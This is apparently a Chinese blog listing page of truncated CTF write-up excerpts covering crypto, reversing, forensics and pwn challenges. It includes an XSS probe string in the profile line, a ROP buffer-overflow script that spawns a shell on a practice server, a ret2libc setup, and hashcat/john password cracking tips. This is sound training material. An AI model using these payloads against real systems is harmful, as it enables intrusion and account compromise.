技巧
RAVEN_1452
<img onerror=alert(1)>
展开
-
[UTCTF2020]hill
【代码】[UTCTF2020]hill。原创 2023-05-18 16:13:57 · 123 阅读 · 0 评论 -
[INSHack2019]Yet Another RSA Challenge - Part 1
【代码】[INSHack2019]Yet Another RSA Challenge - Part 1。原创 2023-05-16 16:07:39 · 139 阅读 · 0 评论 -
【python3】RC4,一道题目
由于密文前面有salt,需要先提取salt然后计算realkey,然后解密。由于rc4的本质采用异或伪随机数流,而其由密钥生成,所以加解密采用一套算法即可。原创 2023-04-21 19:41:56 · 333 阅读 · 0 评论 -
mrctf2020_shellcode
ida分析不了这个,但是本质是call [rbp+buf],等价于以下程序。原创 2023-04-11 13:31:28 · 51 阅读 · 0 评论 -
【python】内置的编码格式3.11.2
CodecAliasesLanguagesasciiEnglishbig5big5hkscscp037Englishcp273Germancp424Hebrewcp437Englishcp500cp720Arabiccp737Greekcp775IBM775cp850cp852cp855cp856Hebrewcp857Turkishcp858cp860Portuguesecp861Icelandiccp862Hebrewcp863。转载 2023-04-02 11:56:59 · 110 阅读 · 0 评论 -
Stein’s Algorithm for finding GCD
【代码】Stein’s Algorithm for finding GCD。转载 2023-02-22 14:57:46 · 74 阅读 · 0 评论 -
【C】Lehmer‘s GCD algorithm
【代码】【C】Lehmer's GCD algorithm。翻译 2023-02-15 13:42:44 · 143 阅读 · 0 评论 -
[ACTF新生赛2020]crypto-classic1,buuctf答案
flag{what_a_classical_vigenere}原创 2023-02-07 22:45:36 · 479 阅读 · 0 评论 -
【python】字符串切割,均分
字符串切割,均分原创 2023-02-02 21:21:23 · 420 阅读 · 0 评论 -
[BJDCTF2020]Polybius
【代码】[BJDCTF2020]Polybius。原创 2023-01-31 01:12:31 · 162 阅读 · 0 评论 -
【python】base64码表-str,list形式
【代码】【python】base64码表-str,list形式。原创 2023-01-24 12:54:10 · 182 阅读 · 0 评论 -
攻防世界crypto【江苏工匠杯】rsarsa
需要正确计算3次整数m的值,以下为sage代码,请在sage shell或者sage notebook中运行。原创 2022-10-17 21:45:58 · 2346 阅读 · 3 评论 -
【除了vmware】hyper-v环境ubuntu虚拟机安装,pwn环境配置
然后进入ubuntu第一件事,更新/etc/apt/source.list文件,因为貌似还不支持复制粘贴,如果你的ubuntu虚拟机能联网就最好了。安装完毕后python3 -m pip install --upgrade pip。快速创建,里面就有ubuntu可选,需要18的话下载2gb左右的文件。hyper-v为windows原生支持,可能需要去控制面板里面开启。即可开始安装pwntools,ropgadget等工具。打开hyper-v管理器,在开始里面应该能搜索到。之后下一步即可,记得记住用户密码。原创 2022-10-05 20:53:06 · 415 阅读 · 0 评论 -
【python】pandas求和某列数据
pandas求和某列数据原创 2022-07-08 21:13:24 · 4429 阅读 · 0 评论 -
子网掩码【python】
l=[]for _ in range(8): tmp=('0b'+(_*'1').ljust(8,'0')) tmp=int(tmp,2) l.append(tmp)print(l)#[0, 128, 192, 224, 240, 248, 252, 254]原创 2022-07-03 16:18:12 · 555 阅读 · 0 评论 -
rsa,n1,n2共p或共q
n1,n2共p或共q原创 2022-06-18 23:14:13 · 439 阅读 · 0 评论 -
buuctf-蜘蛛侠呀
import pysharkimport binasciipackets = pyshark.FileCapture('out.pcap',display_filter="icmp.type==0")res=[]for each in packets: if binascii.unhexlify(each.icmp.data).decode() not in res: res.append(binascii.unhexlify(each.icmp.data).decode(.原创 2022-04-19 00:25:46 · 807 阅读 · 0 评论 -
buuctf-crypto-浪里淘沙
from os import readlinkcontent='''tonightsuccessnoticenoticewewesuccesstonightweexamplecryptoshouldwebackspacetonightbackspaceexamplelearnwesublimlearnbackspacetheshouldwelearnfoundsublimsystemexamplesublimfoundlearnshouldmorningsublimsystemuserlearnth.原创 2022-04-11 17:38:20 · 1288 阅读 · 0 评论 -
[冀信2021]Run_it_36_times的附件
pyc隐写去github下载打包好的,可以在linux下作为命令直接执行原创 2021-12-16 09:24:36 · 614 阅读 · 0 评论 -
[stegosaurus]ValueError: bad marshal data (unknown type code)
去github下载打包好的,可以在linux下作为命令直接执行https://objects.githubusercontent.com/github-production-release-asset-2e65be/156165253/b7398a80-152b-11ea-93c9-a7904e2be171?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211215%2Fus-east-1%2原创 2021-12-15 21:44:03 · 1002 阅读 · 0 评论 -
buuctf reverse2 【angr解法】
import angrp= angr.Project('./reverse_2',auto_load_libs=False)state=p.factory.entry_state()simgr=p.factory.simgr(state)simgr.explore(find=0x400854,avoid=0x400848) if simgr.found: print(simgr.found[0].posix.dumps(0))#{hacking_for_fun}儋 python2结果.原创 2021-12-14 22:03:31 · 618 阅读 · 0 评论 -
【python】列置换,某个题目后半段解法
a = "OCU{CFTELXOUYDECTNGAHOHRNFIENM}IOTA"b = [4,7,5,3,1,2,6]import itertools,refor each in itertools.permutations(b): # print(each,len(each)) a_list=re.findall('.{%d}'%len(each),a) # print(a_list) # print(a) flag=[] for each1 .原创 2021-12-13 15:46:46 · 2636 阅读 · 0 评论 -
buuctf pwn2_sctf_2016
还是旧的libcsearcher好用,提供的库有能正确获取shell的。旧版的libcsearcher找到的库,2号能用新版的libc只能找到这些,没有一个能用的原创 2021-12-09 18:30:03 · 274 阅读 · 0 评论 -
base64变表,根据明密文对照获取标准表结果
import base64m='''They camefirst for the Communists,and I didn't speak upbecause I wasn't a Communist.Then they came for the Jews,and I didn't speak upbecause I wasn't a Jew.Then they came for the trade unionists,and I didn't speak upbecause I wasn.原创 2021-12-08 22:26:53 · 636 阅读 · 0 评论 -
buuctf 救世捷径【dijkstra算法】【单源最短路径算法】
max=2000graph=[[max] * 27 for _ in range(27)]#读取节点信息f=open('dj.txt','r').readlines()#存入列表for x in f: a,b,c,d=x.strip().split(' ') graph[int(a)][int(b)]=int(c) graph[int(b)][int(a)]=int(c)temp1=[True for a in range(27)]zuixiao=[0 f...原创 2021-12-08 12:18:28 · 740 阅读 · 0 评论 -
“‘usb.data_len == 8‘“ is neither a field nor a protocol name.
UsbKeyboardDataHacker在windows环境下使用需要把usb.data_len == 8 两边的单引号去掉python2,3均可正确运行原创 2021-12-03 11:14:49 · 1003 阅读 · 0 评论 -
自动拼图工具gaps安装
可以忽略默认的requirement.txt的版本限制,仍然可正常gaps --image=flag.jpg --generations=40 --population=120 --size=100 --save原创 2021-12-02 16:38:24 · 1191 阅读 · 0 评论 -
pwn,windows无法正确interactive
cmd和powershell运行pwntools写的py文件有问题,体现为interactive后找不到相关的linux命令,由此引申到vscode也不行。并不是你的脚本有问题,而是windows这些命令行的问题,编码格式?ansi,vt标准之类的?不确定建议使用pycharm,wsl,虚拟机运行相关文件。...原创 2021-11-15 18:46:44 · 836 阅读 · 0 评论 -
buuctf pwn rip 1,rop解法
from pwn import *io = remote('node4.buuoj.cn', 27175)pop_rdi_ret=0x4011fbbin_sh=0x40201bsyscall=0x401040ret=0x401016payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall)io.sendline(payload)io.interactive()这个解法有点复杂了,强行构造了一波rop。.原创 2021-11-07 23:20:10 · 1153 阅读 · 0 评论 -
ciscn_2019_c_1,The address should be an int number【libcsearcher】
from pwn import *from LibcSearcher import *context.os='linux'context.arch='amd64'# context.log_level='debug'ru=lambda x:io.recvuntil(x)rl=lambda :io.recvline()sla=lambda x,y:io.sendlineafter(x,y)io=remote('node4.buuoj.cn',27181)elf=ELF('./cisc.原创 2021-11-06 11:08:19 · 303 阅读 · 0 评论 -
2021-10-28pwn
愚蠢的cyclic命令,只能4个字符的数,严格限制输入gdb自带的pattern好用,create生成,offset数偏移,不限制数据类型和输入长度原创 2021-10-28 20:20:58 · 76 阅读 · 0 评论 -
2021-10-28
linux amd64lea rdi,command 参数填充完毕,command=db '/bin/sh'call _system 调用函数systemsystem('/bin/sh')原创 2021-10-28 15:05:12 · 76 阅读 · 0 评论 -
hashcat+john破解rar密码
4位密码,1050ti满载全组合跑了12分钟,不要将john输出的哈希值直接在命令行里让hashcat跑,写在文件里面再导入hashcat以避免特殊符号的歧义。什么nvmlDeviceGetFanSpeed(): Not SupportedHash '?a?a?a?a': Separator unmatchedNo hashes loaded.都是直接将哈希值放在命令行跑造成的。...原创 2021-10-25 20:50:54 · 11342 阅读 · 9 评论 -
python,在格式化字符串中使用半个大括号
'{{{}{}}}'.format(number,number)转义符在这不管用,需要双写原创 2021-10-25 16:49:01 · 228 阅读 · 0 评论 -
pycharm安装z3库,导入后无法使用
去z3官网下载wheel文件安装,不要用pycharm自身的库管理,里面的z3有问题。原创 2021-10-21 09:42:36 · 706 阅读 · 5 评论 -
python2安装sympy报错,gmpy2 for python3
gmpy2,sympy都有python3的版本,下载地址https://www.lfd.uci.edu/~gohlke/pythonlibs/原创 2021-10-21 09:40:47 · 198 阅读 · 0 评论 -
python 逆转字符串,列表
a='123abc'a=a[::-1]b=[1,2,3]b.reverse()原创 2021-10-12 17:09:29 · 84 阅读 · 0 评论 -
ida字符串存储的小端序陷阱
小端序,英文名little endian在ida f5查看伪代码后,如果看到_DWORD v4[7];v4[0] = 0xD6C0B67; v4[1] = 0x175F4078; v4[2] = 0x3302058; v4[3] = 0x725D1244; v4[4] = 0x2E1F3441; v4[5] = 0x6847404D; v4[6] = 0x1B;注意最开始的数据类型,这个数组不光要按照4字节左侧补零对齐,还要将每一组数据翻转才能得到正确的字符串...原创 2021-10-08 20:20:42 · 747 阅读 · 0 评论 -
win7防火墙对nmap扫描的反应
fw-on fw-off 无服务port,fw-off 无服务port,fw-on tcp 无响应 syn,ack 2个reset 无响应 udp 无响应 返回2个icmp 返回2个icmp 无响应...原创 2021-09-11 23:09:44 · 359 阅读 · 0 评论 -
第七届全国工控系统信息安全攻防竞赛-error
过滤器modbus.func_code==16能看到一些exception告警的包它的上一个包内的写入寄存器的值即为flag内容。拼接即可。存在干扰项,flag从第480个包开始由于数量不多 可以手动一个个看,也可以Python脚本。flag{you_cant_fight_fate}...原创 2021-09-06 15:19:30 · 231 阅读 · 0 评论